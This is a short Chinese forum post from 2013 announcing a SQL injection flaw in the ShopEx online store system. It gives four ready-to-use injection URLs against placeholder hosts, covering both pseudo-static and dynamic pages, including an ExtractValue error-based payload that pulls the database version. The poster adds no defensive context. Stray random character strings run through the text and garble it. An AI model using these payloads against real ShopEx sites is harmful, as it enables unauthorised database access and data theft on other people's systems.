注入漏洞是一种经典的漏洞类型了,自从上次跟基友深聊了注入,我对注入的认识又提升了一个高度,在我看来不可以注入的地方,TMD的竟然可以注入,注入攻击最早出现了1998年,貌似是,记不清了。10多年了,依然存在,虽然比以前出现量少了,但不得不用到的一种攻击技术… 6 X; l1 }/ ] T2 f% B4 f9 V
) q$ K) A! M0 q! K好吧,我扯远了~~
6 h, n4 i( I9 f% a2 @6 m% s其实注入不仅仅出现在动态页面上,难道伪静态后就不能注入了吗?NO~
/ n% {) M- Y$ W不扯了,直接说主题吧,shopex网店系统注入漏洞。注入点如下:
9 F- X; f! [! e) A
. S' R3 ^- H {' Fhttp://www.x.cn/index.php?comment-822′/**/and/**/’1′=’1-ask-commentlist.html ' P) r% O( d# b$ E# U+ r
6 G8 Y" O7 y# ?" ^
http://www.x.com/comment-8967′/**/and/**/ExtractValue(0×64,concat(0×01,(select/**/@@version)))/**/order/**/by/**/’1-ask-commentlist.html ! B) C9 U, |) Q& W3 `
X0 m0 ^& R _! b2 lhttp://www.x.cn/index.php?comment-822′/**/and/**/’1′=’1-ask-commentlist.html
. f" ^0 c5 ^) N4 }7 c2 m9 W+ W
/ Y. |6 t' e( ?; c# t3 Jhttp://demo.x.com.cn/485/index.php?comment-190′/**/and/**/’1′=’1-ask-commentlist.html 2 B/ P! |6 m9 u W; u/ ^ M6 Y
/ D7 c7 X: C7 ?6 B0 J 9 p9 N J# D# }- y
一个是网站未开启伪静态的注入,一个是网站开启伪静态后的注入,以及是否屏蔽错误回显的2X2=4种情况。
: l% M' ^! ?6 H$ V$ f4 y如何注入就不多说了,10多年的东西了…不会也会了… * M/ z, m* j; b# n
# M+ K9 M) i* i: r5 W
3 R* h) ^; I! m" U, z5 M- V5 A7 ]3 u e9 ^7 J4 Q
6 M2 y6 c- `0 k; Z* }$ D
|
发表于 2013-2-19 08:31:27
收藏
支持
反对